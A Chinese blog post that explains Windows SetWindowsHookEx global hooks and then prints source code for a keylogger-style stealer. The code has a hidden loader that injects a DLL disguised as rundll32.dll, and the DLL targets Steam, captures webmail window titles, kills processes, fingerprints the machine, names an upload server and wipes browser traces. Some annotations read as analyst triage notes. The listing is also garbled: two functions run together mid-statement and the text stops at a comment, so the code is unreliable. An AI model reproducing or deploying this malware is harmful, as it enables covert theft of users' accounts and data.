SetWindowsHookEx: 全局钩子实现键盘记录器


简介

        SetWindowsHookEx 钩子(Hook),是Windows消息处理机制的一个平台,应用程序可以在上面设置子程以监视指定窗口的某种消息,而且所监视的窗口可以是其他进程所创建的。当消息到达后,钩子会在目标窗口的处理函数之前先处理它。钩子机制允许应用程序截获并处理Windows消息或特定事件。

        钩子实际上是一个处理消息的程序段,通过系统调用,把它挂入系统。每当特定的消息发出,在没有到达目的窗口前,钩子程序就先捕获该消息,亦即钩子函数先得到控制权。这时钩子函数即可以加工处理(改变)该消息,也可以不作处理而继续传递该消息,还可以强制结束消息的传递。在窗口消息的处理流程插队加入自己的处理函数。

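        在Ring3级下,SetWindowsHookEx 这个函数能够优先拦截提交给特定窗口的消息,进行拦截者需要的处理,然后再提交给窗口函数或下一个钩子函数。函数的第一个参数 idHook 用于指定钩子的类型,在以下代码样例中我们选择安装的钩子类型为WH_GETMESSAGE,用来拦截WM_KEYDOWN键盘消息。需要注意,这类全局钩子(dwThreadId 为 0)的回调函数必须位于 DLL 中,系统会把该 DLL 加载到同一桌面上位数相同的其他进程里;因此,在无关进程的已加载模块列表中出现陌生 DLL,是排查此类钩子的一个重要线索。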

函数原型:

// Prototype as shown on this page; the listing omits the return type and calling convention.
SetWindowsHookEx(
     // Hook type (one of the WH_* values listed in the table below).
    _In_ int idHook,
    // Address of the hook callback procedure.
    _In_ HOOKPROC lpfn,
    // Handle of the module instance that contains the hook procedure.
    _In_opt_ HINSTANCE hmod,
    // ID of the thread to hook; 0 means no specific thread, i.e. a global hook.
    _In_ DWORD dwThreadId);

设置Hook类型如下: 

宏值 含义
WH_MSGFILTER 截获用户与控件交互的消息
WH_KEYBOARD 截获键盘消息
WH_GETMESSAGE 截获从消息队列送出的消息
WH_CBT 截获系统基本消息,激活,建立,销毁,最小化,最大化,移动,改变尺寸等窗口事件
WH_MOUSE 截获鼠标消息
WH_CALLWNDPROCRET 截获目标窗口处理完毕的消息

返回值:

若此函数执行成功,则返回值就是该挂钩处理过程的句柄;若此函数执行失败,则返回值为NULL(0)。若想获得更多错误信息,请调用GetLastError函数。


实现代码

以下是部分实现代码,忘了是啥年代写的,没啥技术含量,大佬可以忽略。 

主程序:

// Steam.cpp : Defines the entry point for the application.
//

#include "stdafx.h"

 
// 函数声明

LRESULT CALLBACK    WndProc(HWND, UINT, WPARAM, LPARAM);

 
// 程序入口点

// Program entry point of the loader executable.
//
// What the visible code does, in order:
//   1. registers a window class and creates a 1x1, disabled window that is never shown
//      (ShowWindow is called with 0);
//   2. builds "<system drive>:\Program Files\Common Files\rundll32.dll", loads that DLL and
//      calls its "installhook" export;
//   3. runs a message loop until WM_QUIT.
//
// Triage notes: the DLL borrows the file name of a Windows component but sits outside the
// system directory and carries a .dll extension, so a module-load event for this path is a
// useful indicator. The process has no visible window by construction.
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
 	// TODO: Place code here.

	// Marker string (the author labels it an "encryption marker"); it is not read again in this function.
	CString Error = "****** 2019.04.07";

    MSG msg;
    HWND hWnd;
    char szTitle[]="Rainbow";                                // The title bar text
    char szWindowClass[]="RBTools";                                // The window class name
    WNDCLASSEX wcex={0};
    wcex.cbSize = sizeof(WNDCLASSEX);        // size of the WNDCLASSEX structure
    wcex.style            = CS_HREDRAW | CS_VREDRAW;    // redraw when the size changes
    wcex.lpfnWndProc    = (WNDPROC)WndProc;            // message handler
    wcex.hInstance        = 0;            // instance handle is left at 0 rather than hInstance
    wcex.hbrBackground    = (HBRUSH)COLOR_WINDOWFRAME;    // background brush
    wcex.lpszClassName    = szWindowClass;        // window class name
    wcex.hIcon            =0;        // icon
    wcex.hCursor        =0;        // cursor
    wcex.lpszMenuName    =0;        // menu name
    wcex.hIconSm        =0;        // small icon
    RegisterClassEx(&wcex);            // register the window class (return value not checked)
 
    hWnd = CreateWindow(szWindowClass, szTitle, WS_DISABLED,    // create the 1x1 disabled window
      CW_USEDEFAULT,CW_USEDEFAULT, 1, 1, NULL, NULL, 0, NULL);
    if (!hWnd){
      return FALSE;
    }
 
    ShowWindow(hWnd, 0);    // 0 == SW_HIDE: the window stays invisible
    UpdateWindow(hWnd);

    char szDllPath1[MAX_PATH] = { 0 };

	// Only the drive prefix ("X:") of the system directory is kept; see the strcpy below.
	GetSystemDirectory(szDllPath1, sizeof(szDllPath1));

    // Overwrites everything after the first two characters, giving
    // "X:\Program Files\Common Files\rundll32.dll".
    strcpy(szDllPath1+2, "\\Program Files\\Common Files\\rundll32.dll");

	static HINSTANCE hinstDLL1;
	typedef void (CALLBACK *inshook1)();// pointer type of the exported install routine
	inshook1 instkbhook1;
	if(hinstDLL1=LoadLibrary((LPCTSTR)szDllPath1))
	{
		// NOTE(review): the GetProcAddress result is called without a NULL check, so a DLL
		// that lacks the "installhook" export makes this call through a null pointer.
		instkbhook1=(inshook1)GetProcAddress(hinstDLL1, "installhook"); 
		instkbhook1();
	}
 
    while (GetMessage(&msg, NULL, 0, 0))     // message loop
    {
        TranslateMessage(&msg);        // translate virtual-key messages into character messages
        DispatchMessage(&msg);        // dispatch the message to the window procedure
    }
    return msg.wParam;
}

// Window procedure of the hidden window: WM_DESTROY posts the quit message,
// every other message is handed to the default window procedure.
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    if (message != WM_DESTROY)
    {
        return DefWindowProc(hWnd, message, wParam, lParam);
    }

    PostQuitMessage(0);    // lets the GetMessage loop in WinMain terminate
    return 0;
}

 HOOK DLL:

// test3.cpp : Defines the initialization routines for the DLL.
//

#include "stdafx.h"
#include "test3.h"

// Export decoration used on the functions of this DLL.
#define  DllExport _declspec(dllexport)

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

// Size in bytes of the zero-filled buffer WipeFile writes per chunk.
#define SWEEP_BUFFER_SIZE 10000

// Section merging (disabled).
//#pragma comment(linker, "/MERGE:.rdata=.data")
//#pragma comment(linker, "/MERGE:.text=.data")
//#pragma comment(linker, "/MERGE:.reloc=.data")

// Named data section. In this listing the section is opened and closed again with no
// variables in between, so nothing is placed in it here.
#pragma data_seg(".SHARDAT")

#pragma data_seg()

// Section attributes: read, write and execute. The author calls this a "shared" section,
// but the S (shared) attribute is not among the flags given.
// Triage note: a section that is both writable and executable is an unusual PE trait and
// is easy to flag during static inspection of the DLL.
#pragma comment(linker, "/section:.SHARDAT,RWE")

// ---------------------------------------------------------------------------
// User data
// ---------------------------------------------------------------------------
							// Expiry date
							CString UserEndData = "2019.05.04";

// ---------------------------------------------------------------------------
// Configuration data (all values are compiled into the DLL as plain strings,
// so they can be recovered from the binary by string extraction)
// ---------------------------------------------------------------------------

							// User ID
							CString strUserID = "002";

							// Program version
							CString szVersion = "20190407_3";

							// "Statistics" endpoint
							CString strServerName = "http://login.37wan.com/";

							// "Mailbox & upload" endpoint; SearchFilesByWildcard_2 uses it as the upload URL
							CString strMailServerName = "http://upload.37wan.com/";

// ---------------------------------------------------------------------------

// osx receives the OS description built by os(); the use of jsj is not visible in this part of the file.
char osx[MAX_PATH]={0};
char jsj[MAX_PATH]={0};

// Working strings shared between the functions of this DLL.
// szLocalLP and szMyselfPath are read by SearchFilesByWildcard_2; szMailName is written by EnumWindowsProc.
CString szLocalLP = "";
CString szAccount = "";
CString myEmailSTR = "";
CString szMyselfPath = "";
CString szStr = "", szStr2 = "";
CString szMailID, szMailName, szMailAddr;
CString szRegExe, szSTPath, szSTFile, szOneUser, szRegUser, szRegUser2, szStrFirst, szStrSecon; 

// State flags. szEMailName is set once EnumWindowsProc has written the window title to disk;
// the other flags are used outside the part of the file shown here.
BOOL Login = false;
BOOL Regedit = false;
BOOL szBrowser = false;
BOOL szIERegedit = false;
BOOL szEMailName = false;
BOOL szTslgameEXE = false;

 

HWND hcaretWnd = NULL;
static HANDLE thread = NULL;

// Module and hook handles; presumably one pair per installed hook -- confirm against the install routine.
HINSTANCE hins = NULL;
static HHOOK hkb = NULL;

HINSTANCE hinss = NULL;
static HHOOK hie = NULL;

// Standard Base64 alphabet used by the encoding routine.
static char TAB_BASE64[]={"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"};

 
//
//	Note!
//
//		If this DLL is dynamically linked against the MFC
//		DLLs, any functions exported from this DLL which
//		call into MFC must have the AFX_MANAGE_STATE macro
//		added at the very beginning of the function.
//
//		For example:
//
//		extern "C" BOOL PASCAL EXPORT ExportedFunction()
//		{
//			AFX_MANAGE_STATE(AfxGetStaticModuleState());
//			// normal function body here
//		}
//
//		It is very important that this macro appear in each
//		function, prior to any calls into MFC.  This means that
//		it must appear as the first statement within the 
//		function, even before any object variable declarations
//		as their constructors may generate calls into the MFC
//		DLL.
//
//		Please see MFC Technical Notes 33 and 58 for additional
//		details.
//

//
// CTest3App

BEGIN_MESSAGE_MAP(CTest3App, CWinApp)
	//{{AFX_MSG_MAP(CTest3App)
		// NOTE - the ClassWizard will add and remove mapping macros here.
		//    DO NOT EDIT what you see in these blocks of generated code!
	//}}AFX_MSG_MAP
END_MESSAGE_MAP()

 
// 提升程序系统权限

// Enables SeDebugPrivilege (SE_DEBUG_NAME) in the access token of the current process.
//
// Returns TRUE when AdjustTokenPrivileges reports success, and also when OpenProcessToken
// fails with ERROR_CALL_NOT_IMPLEMENTED; returns FALSE on any other failure.
//
// NOTE(review): AdjustTokenPrivileges can return nonzero although the privilege was not
// granted (GetLastError() is then ERROR_NOT_ALL_ASSIGNED). That case is not checked, so
// TRUE does not prove the privilege is held.
// Triage note: a non-debugger process enabling SeDebugPrivilege is a common audit signal.
BOOL DllExport AdjustPrivileges()
{
	HANDLE hToken = NULL;
	TOKEN_PRIVILEGES tp = {0};
	TOKEN_PRIVILEGES oldtp = {0};
	DWORD dwSize = sizeof(TOKEN_PRIVILEGES);
	LUID luid = {0};

	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
		if (GetLastError()==ERROR_CALL_NOT_IMPLEMENTED)
			return TRUE;
		else
			return FALSE;
	}
	// Resolve the LUID of SeDebugPrivilege on the local system.
	if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) {
		CloseHandle(hToken);
		return FALSE;
	}

	tp.PrivilegeCount=1;
	tp.Privileges[0].Luid = luid;
	tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

	/* Adjust Token Privileges */
	if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), &oldtp, &dwSize)) {
		CloseHandle(hToken);
		return FALSE;
	}

	// close handles
	CloseHandle(hToken);
	return TRUE;
}

 
// 设置当前进程优先级为最高(实时)

// Requests REALTIME_PRIORITY_CLASS for the current process.
// Returns TRUE when SetPriorityClass succeeds and FALSE otherwise.
BOOL DllExport SetRealTimePriority()
{
	const BOOL raised = SetPriorityClass( GetCurrentProcess(), REALTIME_PRIORITY_CLASS );
	return raised ? TRUE : FALSE;
}

 
// 数据加密

// Returns the character code of a as an int.
// 'A' is 65 in ASCII, so subtracting 'A' and adding 65 cancel each other out.
int DllExport tranasci(char a)
{
	const int offsetFromA = a - 'A';
	return offsetFromA + 65;
}

CString DllExport gen(CString m_url)
{
	int i=0;
	int l=0;
	int k=0;
	CString curl;

	l=m_url.GetLength();

	for(i;i>2)&0x3F;   
        chrBs[1]=((chr[0]<<4)|(chr[1]>>4))&0x3F;   
        chrBs[2]=((chr[1]<<2)|(chr[2]>>6))&0x3F;   
        chrBs[3]=chr[2]&0x3F;   
        chrBs[0]=TAB_BASE64[chrBs[0]];   
        chrBs[1]=TAB_BASE64[chrBs[1]];   
        chrBs[2]=TAB_BASE64[chrBs[2]];   
        chrBs[3]=TAB_BASE64[chrBs[3]];   
        strOut+=chrBs;   
    }   
    if (1==Len%3)   
    {   
        chr[0]=(BYTE)strIn.GetAt(Len-1);   
        chrBs[0]=(chr[0]>>2)&0x3F;   
        chrBs[1]=(chr[0]<<4)&0x3F;   
        chrBs[0]=TAB_BASE64[chrBs[0]];   
        chrBs[1]=TAB_BASE64[chrBs[1]];   
        chrBs[2]='=';   
        chrBs[3]='=';   
        strOut+=chrBs;   
    }   
    else if (2==Len%3)   
    {   
        chr[0]=(BYTE)strIn.GetAt(Len-2);   
        chr[1]=(BYTE)strIn.GetAt(Len-1);   
        chrBs[0]=(chr[0]>>2)&0x3F;   
        chrBs[1]=((chr[0]<<4)|(chr[1]>>4))&0x3F;   
        chrBs[2]=(chr[1]<<2)&0x3F;   
        chrBs[0]=TAB_BASE64[chrBs[0]];   
        chrBs[1]=TAB_BASE64[chrBs[1]];   
        chrBs[2]=TAB_BASE64[chrBs[2]];   
        chrBs[3]='=';   
        strOut+=chrBs;   
    }   
    return strOut;   
} 

 
// 获取随机名称

// Builds a six-letter name that alternates upper-case (even positions) and lower-case
// (odd positions) letters. SearchFilesByWildcard_2 uses it to name the script it drops.
//
// The generator is reseeded with time(NULL) on every call, so the result is a function
// of the wall-clock second only: two calls that start within the same second return the
// same name, and the name can be recomputed from a file's creation time.
// Each call blocks for at least 600 ms because of the Sleep(100) per letter.
CString DllExport GetName()
{
	CString mySTR1 = "", mySTR2 = "";

	time_t seed = time(NULL); 
	srand((unsigned)seed);

	for(int j=0; j<6 ;j++)
	{
		int randNum = rand()%26;// random value in 0..25

		if(j%2)
		{
			mySTR1.Format("%C", randNum+97);// 97..122 are the lower-case ASCII letters
		}
		else
		{
			mySTR1.Format("%C", randNum+65);// 65..90 are the upper-case ASCII letters
		}
		mySTR2 += mySTR1;
		// The author sleeps "to spread the random factor"; the seed was already fixed
		// above, so the pause does not change the values rand() returns.
		Sleep(100);
	}
	return mySTR2;
}

 
// 结束进程

// Terminates every running process whose executable name equals szProcess
// (case-insensitive, exact match on the name reported by the Toolhelp snapshot).
//
// Returns TRUE if at least one matching process could be opened, FALSE otherwise
// (including when the snapshot could not be created). The result of TerminateProcess
// itself is not checked.
//
// NOTE(review): CloseHandle is called even when OpenProcess returned NULL.
// Triage note: the handle is requested with PROCESS_ALL_ACCESS, which is what
// process-access auditing will record for the target process.
BOOL DllExport KillProcess(CString szProcess)
{
	BOOL szKill = FALSE;
	PROCESSENTRY32 pe32;
	pe32.dwSize =sizeof(pe32);
	HANDLE hpro=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
	if(hpro==INVALID_HANDLE_VALUE)
	{  
		return szKill;
	}

	szProcess.MakeLower();

	BOOL nowrun=Process32First(hpro,&pe32);
	while(nowrun)
	{
		// Compare lower-cased names so the match ignores case.
		CString szGetProcess;
		szGetProcess = pe32.szExeFile;
		szGetProcess.MakeLower();

		if(szGetProcess == szProcess)
		{
			DWORD proid=pe32.th32ProcessID;
			HANDLE hprocess=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,proid);
			if(hprocess!=NULL)
			{
				::TerminateProcess(hprocess,0);

				szKill = TRUE;
			}
			::CloseHandle(hprocess);
		}
		nowrun=::Process32Next(hpro,&pe32);
	}
	::CloseHandle(hpro);
	return szKill;
}

 
// 获取 steam.exe 进程标识

// Returns the process ID of the first snapshot entry whose lower-cased executable name
// contains "steam.exe", or (DWORD)-1 when none is found.
//
// NOTE(review), all visible in the code below:
//  - Process32Next is called before the first comparison, so the entry returned by
//    Process32First is never examined.
//  - The match is a substring test (Find), not an equality test.
//  - On a match the function returns without closing the snapshot handle or deleting
//    Info; both are also skipped when Process32First fails.
//  - The snapshot handle is not checked against INVALID_HANDLE_VALUE.
DWORD DllExport GetEXE()
{
	HANDLE m_handle=::CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
	PROCESSENTRY32* Info = new PROCESSENTRY32;
	Info->dwSize = sizeof(PROCESSENTRY32);
	if(::Process32First(m_handle,Info))
	{
		while(::Process32Next(m_handle,Info)!=FALSE)
		{
			CString ss;
			ss=Info->szExeFile;
			ss.MakeLower();
			if(ss.Find("steam.exe") != -1)
			{
				return Info->th32ProcessID;
			}
		}
		::CloseHandle(m_handle);
		if(Info)
		{
			delete Info;
		}
	}
	return -1;
}

 
// 查找进程

// Reports whether a process with the given executable name is running.
// The comparison is case-insensitive and requires the whole name to match.
// Returns TRUE on the first match, FALSE when the snapshot holds no match.
BOOL DllExport GetProcess(CString TargetName) 
{ 
	CString wanted(TargetName);
	wanted.MakeLower();

	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
	PROCESSENTRY32 entry = {sizeof(PROCESSENTRY32),0};

	BOOL found = FALSE;
	for( BOOL more = Process32First(snapshot,&entry); more; more = Process32Next(snapshot, &entry) )
	{
		CString current = entry.szExeFile;
		current.MakeLower();

		if( wanted == current )
		{
			found = TRUE;
			break;
		}
	}

	// Single exit point: the snapshot handle is released on both outcomes.
	CloseHandle(snapshot);
	return found;
}

 
// 枚举顶层窗口获取标题

// EnumWindows callback that looks for a visible top-level window whose title looks like
// a web-mail page.
//
// A window qualifies when its title does NOT contain the first keyword (MAIL0) and DOES
// contain at least one of the other keywords (MAIL1..MAIL7). If that window is also the
// foreground window, the title is stored in szMailName and, once per process (guarded by
// szEMailName), written to C:\MailName.txt; enumeration then stops (return FALSE).
// In every other case enumeration continues (return TRUE).
//
// Triage note: creation of C:\MailName.txt is a file-system indicator of this routine.
//
// NOTE(review):
//  - fclose(fps1) runs even when fopen failed and fps1 is NULL.
//  - GetWindowText is given sizeof(sTitle), a byte count; that equals the character
//    count only when TCHAR is char. The strstr calls on sTitle imply the same assumption.
BOOL DllExport CALLBACK EnumWindowsProc(HWND hWnd, LPARAM lParam)
{
    if( GetParent(hWnd)==NULL && IsWindowVisible(hWnd) )
    {
		TCHAR sTitle[MAX_PATH]={0};
		ZeroMemory(sTitle, MAX_PATH * sizeof(TCHAR));

		GetWindowText(hWnd, sTitle, sizeof(sTitle));
		//SendMessage(hWnd, WM_GETTEXT, (WPARAM)MAX_PATH, (LPARAM)sTitle);

		//AfxMessageBox(sTitle);

		CString szMainName = "";
		szMainName.Format(TEXT("%s"), sTitle);

		// Exclusion keyword: titles containing it are ignored.
		int MAIL0 = szMainName.Find("邮箱大全", 0);

		// Inclusion keywords: any one of them is enough.
		char *MAIL1;
		MAIL1 = strstr(sTitle, "邮箱");

		char *MAIL2;
		MAIL2 = strstr(sTitle, "电子邮");

		char *MAIL3;
		MAIL3 = strstr(sTitle, "免费邮");

		char *MAIL4;
		MAIL4 = strstr(sTitle, "电子邮件");

		char *MAIL5;
		MAIL5 = strstr(sTitle, "手机统一");

		char *MAIL6;
		MAIL6 = strstr(sTitle, "Microsoft 帐户");

		char *MAIL7;
		MAIL7 = strstr(sTitle, "Yahoo -");

		if( MAIL0 == -1 && (MAIL1 || MAIL2 || MAIL3 || MAIL4 || MAIL5 || MAIL6 || MAIL7) )
		{
			// Only the window the user is currently working in is of interest.
			HWND Hwnd_Browser = ::GetForegroundWindow();
			if(hWnd == Hwnd_Browser)
			{
				if(!szEMailName)
				{
					CString szACCID;
					szACCID.Format(TEXT("C:\\MailName.txt"));

					szMailName.Format(TEXT("%s"), sTitle);

					// Write the captured title to disk (mode "w" truncates an existing file).
					FILE *fps1;
					fps1=fopen(szACCID, "w");
					if(fps1)
					{
						fprintf(fps1, "%s", szMailName.GetBuffer(0));
					}
					fclose(fps1);

					szEMailName = true;
				}
				//AfxMessageBox(szMailName);

				return FALSE;
			}
		}
    }
    return TRUE;
}

 
// 获取 MAC

// Receive buffer for the NCBASTAT command: the adapter status block followed by
// room for 30 name entries.
typedef struct _ASTAT_ 
{ 
	ADAPTER_STATUS adapt; 
	NAME_BUFFER    NameBuff[30]; 
}ASTAT, * PASTAT;

// Queries one LAN adapter through the NetBIOS API.
//
// lana_num  adapter (LANA) number to query
// Adapter   receives the adapter status, including the 6-byte adapter address
// Returns the NetBIOS return code of the NCBASTAT command (0 means success).
// The return code of the preceding NCBRESET command is overwritten and never examined.
UCHAR DllExport GetAddressByIndex(int lana_num,ASTAT & Adapter)
{
	UCHAR uRetCode; 
	//-------------------------------------------------------------------
	NCB ncb; 
	memset(&ncb, 0, sizeof(ncb) ); 
	ncb.ncb_command = NCBRESET; 
	ncb.ncb_lana_num = lana_num; 
	// Select the adapter and send NCBRESET first to initialise it.
	uRetCode = Netbios(&ncb ); 
	memset(&ncb, 0, sizeof(ncb) ); 
	ncb.ncb_command = NCBASTAT; 
	ncb.ncb_lana_num = lana_num;// adapter number
	// Call name "*" followed by six spaces; the rest of the field stays zero from the memset.
	strcpy((char *)ncb.ncb_callname,"*      " ); 
	ncb.ncb_buffer = (unsigned char *)&Adapter; 
	// Buffer that receives the returned information.
	ncb.ncb_length = sizeof(Adapter); 
	// Send NCBASTAT to obtain the adapter information.
	uRetCode = Netbios(&ncb ); 
	//-------------------------------------------------------------------
	return uRetCode;
}

// Returns a MAC address as 12 upper-case hex digits without separators.
//
// All adapters reported by NCBENUM are queried in turn and each successful query
// overwrites the result, so the value returned belongs to the last adapter that
// answered. The string is empty when enumeration fails or no adapter answers.
CString DllExport GetMacAddress(void)
{
	CString strMacAddress;
	//-------------------------------------------------------------------
	NCB ncb; 
	UCHAR uRetCode;
	int num = 0;
	LANA_ENUM lana_enum; 
	memset(&ncb, 0, sizeof(ncb) ); 
	ncb.ncb_command = NCBENUM; 
	ncb.ncb_buffer = (unsigned char *)&lana_enum; 
	ncb.ncb_length = sizeof(lana_enum); 
	// NCBENUM returns how many adapters the machine has and the number of each one.
	uRetCode = Netbios(&ncb);
	if (uRetCode == 0) 
	{
		num = lana_enum.length;
		// Query every adapter by its number and format its address.
		for (int i = 0; i < num; i++)
		{
			ASTAT Adapter;
			if(GetAddressByIndex(lana_enum.lana[i],Adapter) == 0)
			{
				strMacAddress.Format(_T("%02X%02X%02X%02X%02X%02X"), 
					Adapter.adapt.adapter_address[0], 
					Adapter.adapt.adapter_address[1], 
					Adapter.adapt.adapter_address[2], 
					Adapter.adapt.adapter_address[3], 
					Adapter.adapt.adapter_address[4], 
					Adapter.adapt.adapter_address[5]);
			}
		}
	}
	//-------------------------------------------------------------------
	return strMacAddress;
}

 
// 获取 IE 版本

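// Reads the Internet Explorer version string from
// HKLM\SOFTWARE\Microsoft\Internet Explorer (64-bit registry view).
//
// The "svcVersion" value is preferred; "Version" is used only when the first
// query fails. Returns an empty string when the key or both values are missing.
//
// Changes against the original listing:
//  - the two heap buffers were never freed; a stack buffer replaces them;
//  - RegCloseKey was called on an uninitialised handle when RegOpenKeyEx failed;
//  - registry strings are not guaranteed to be NUL-terminated, so the buffer
//    keeps one extra zero byte beyond the 80 bytes offered to the API.
CString DllExport GetIEVerSion()
{
	CString myIEVersion = "";
	HKEY    hKEY = NULL;
	LPCTSTR data_Set = "SOFTWARE\\Microsoft\\Internet Explorer";

	if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_WOW64_64KEY | KEY_READ, &hKEY) != ERROR_SUCCESS)
	{
		// Nothing was opened, so there is nothing to close.
		return myIEVersion;
	}

	// Value names in order of preference.
	const char* const valueNames[] = { "svcVersion", "Version" };
	for (int i = 0; i < 2; ++i)
	{
		BYTE  buffer[80 + 1] = {0};	// +1 keeps a terminating zero after a full 80-byte read
		DWORD type = REG_SZ;
		DWORD cbData = 80;

		if (::RegQueryValueEx(hKEY, valueNames[i], NULL, &type, buffer, &cbData) == ERROR_SUCCESS)
		{
			myIEVersion.Format(TEXT("%s"), (char *)buffer);
			break;
		}
	}

	RegCloseKey(hKEY);
	return myIEVersion;
}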

 
// 获取系统位数

// Reports whether the current process runs under WOW64.
// IsWow64Process is looked up at run time; when kernel32 does not export it,
// the function returns FALSE. Note that a native 64-bit process also yields
// FALSE, so the result describes this process rather than the OS bitness as such.
BOOL DllExport IsWow64()
{
    typedef BOOL (WINAPI *LPFN_ISWOW64PROCESS) (HANDLE, PBOOL);

    BOOL runningUnderWow64 = FALSE;
    LPFN_ISWOW64PROCESS query =
        (LPFN_ISWOW64PROCESS)GetProcAddress( GetModuleHandle("kernel32"),"IsWow64Process");
    if (query == NULL)
    {
        return runningUnderWow64;
    }

    query(GetCurrentProcess(),&runningUnderWow64);
    return runningUnderWow64;
}

 
// 获取系统版本

// Appends a human-readable OS name plus " x64" or " x86" to the global buffer osx.
//
// Windows 8.1 and Windows 10 are recognised through ntdll's RtlGetNtVersionNumbers;
// older versions through GetVersionEx. The architecture suffix comes from IsWow64().
//
// NOTE(review):
//  - The GetProcAddress result is called without a NULL check.
//  - The module handle returned by LoadLibrary is never released.
//  - The text is appended with strcat, so a second call extends the previous content
//    of osx instead of replacing it.
void DllExport os()
{
	// First decide whether this is Windows 8.1 or Windows 10.
	typedef void(__stdcall*NTPROC)(DWORD*, DWORD*, DWORD*);
	HINSTANCE hinst = LoadLibrary("ntdll.dll");
	DWORD dwMajor, dwMinor, dwBuildNumber;
	NTPROC proc = (NTPROC)GetProcAddress(hinst, "RtlGetNtVersionNumbers"); 
	proc(&dwMajor, &dwMinor, &dwBuildNumber); 
	if (dwMajor == 6 && dwMinor == 3)	//win 8.1
	{
		strcat(osx, "Win 8.1");
	}
	else if (dwMajor == 10 && dwMinor == 0)	//win 10
	{
		strcat(osx, "Win 10");
	}
	else
	{
		// Versions older than Windows 8.1.
		SYSTEM_INFO info;                // used to recognise the 64-bit AMD64 architecture
		GetSystemInfo(&info);            // fill the structure
		OSVERSIONINFOEX os;
		os.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
		#pragma warning(disable:4996)
		if (GetVersionEx((OSVERSIONINFO *)&os))
		{
			// Map the version numbers to a product name.
			switch (os.dwMajorVersion)
			{
			case 5:
				switch (os.dwMinorVersion)
				{
				case 0:
					strcat(osx, "Win 2000");
					break;
				case 1:
					strcat(osx, "Win XP");
					break;
				case 2:
					if (os.wProductType == VER_NT_WORKSTATION &&
						info.wProcessorArchitecture == PROCESSOR_ARCHITECTURE_AMD64)
						strcat(osx, "Win XP Professional x64 Edition");
					else
						strcat(osx, "Win Server 2003");
					break;
				}
				break;
			case 6:
				switch (os.dwMinorVersion)
				{
				case 0:
					if (os.wProductType == VER_NT_WORKSTATION)
						strcat(osx, "Win Vista");
					else
						strcat(osx, "Win Server 2008");
					break;
				case 1:
					if (os.wProductType == VER_NT_WORKSTATION)
						strcat(osx, "Win 7");
					else
						strcat(osx, "Win Server 2008 R2");
					break;
				case 2:
					if (os.wProductType == VER_NT_WORKSTATION)
						strcat(osx, "Win 8");
					else
						strcat(osx, "Win Server 2012");
					break;
				}
				break;
			default:
				strcat(osx, "Unkonw OS");
			}
		}
		else
			strcat(osx, "Unkonw OS");
	}

	// Architecture suffix, as reported by IsWow64().
	if(IsWow64())
	{
		strcat(osx, " x64");
	}
	else
	{
		strcat(osx, " x86");
	}
}

 
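// Cache-cleaning helpers (DeleteUrlCache, WipeFile, EmptyDirectory, DelTempFiles).
// DelTempFiles ties them together: it starts "ipconfig.exe /flushdns" and a hidden cmd.exe
// whose command line is a chain of "del /f /s /q" over the cookie, history and cache paths
// of Internet Explorer, 360se6, 360Chrome, 2345Explorer and liebao; it empties the
// CSIDL_COOKIES folder and removes the entries of the WinINet URL cache.
// Process-creation logs that record these command lines are the most direct trace of
// this routine on a host.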

enum DEL_CACHE_TYPE // kind of URL-cache entry to delete
{
	File,// temporary Internet files
	Cookie // cookies
};

// Deletes entries from the WinINet URL cache.
//
// type  File   -> delete every entry that is not a cookie entry
//       Cookie -> delete only the cookie entries
// Returns TRUE after the enumeration has run, FALSE when the first entry could not be
// retrieved.
//
// NOTE(review): the enumeration handle hEntry is never passed to FindCloseUrlCache, and
// the results of the individual DeleteUrlCacheEntry calls are ignored.
BOOL DllExport DeleteUrlCache(DEL_CACHE_TYPE type)
{
    BOOL bRet = FALSE;
	HANDLE hEntry;
    LPINTERNET_CACHE_ENTRY_INFO lpCacheEntry = NULL;  
    DWORD dwEntrySize;

 	//delete the files
	// First call with no buffer only asks for the size of the first entry.
	dwEntrySize = 0;
    hEntry = FindFirstUrlCacheEntry(NULL, NULL, &dwEntrySize);
	lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];
    hEntry = FindFirstUrlCacheEntry(NULL, lpCacheEntry, &dwEntrySize);
	if (!hEntry)
	{
		goto cleanup;
	}

	do
    {
		if (type == File &&
			!(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY))
		{
			DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
		}
		else if (type == Cookie &&
			(lpCacheEntry->CacheEntryType & COOKIE_CACHE_ENTRY))
		{
			DeleteUrlCacheEntry(lpCacheEntry->lpszSourceUrlName);
		}

		// Size probe for the next entry, then a fresh buffer of that size.
		dwEntrySize = 0;
		FindNextUrlCacheEntry(hEntry, NULL, &dwEntrySize);
		delete [] lpCacheEntry; 
		lpCacheEntry = (LPINTERNET_CACHE_ENTRY_INFO) new char[dwEntrySize];
	}
	while (FindNextUrlCacheEntry(hEntry, lpCacheEntry, &dwEntrySize));

	bRet = TRUE;
cleanup:
	if (lpCacheEntry)
	{
		delete [] lpCacheEntry; 
	}
    return bRet;
}

// Overwrites the content of szDir\szFile with zero bytes, leaving the first 64 bytes
// untouched, in chunks of SWEEP_BUFFER_SIZE.
//
// Returns FALSE only when the file cannot be opened for writing; write errors are not
// reported.
//
// NOTE(review):
//  - dwSize is an unsigned DWORD, so "dwSize -= 64" wraps around for a file shorter
//    than 64 bytes and the loop then keeps writing far past the original end of file.
//  - A failing GetFileSize (INVALID_FILE_SIZE) is not detected either.
// Forensic note: a file processed here keeps its size and first 64 bytes, with all
// remaining bytes zero.
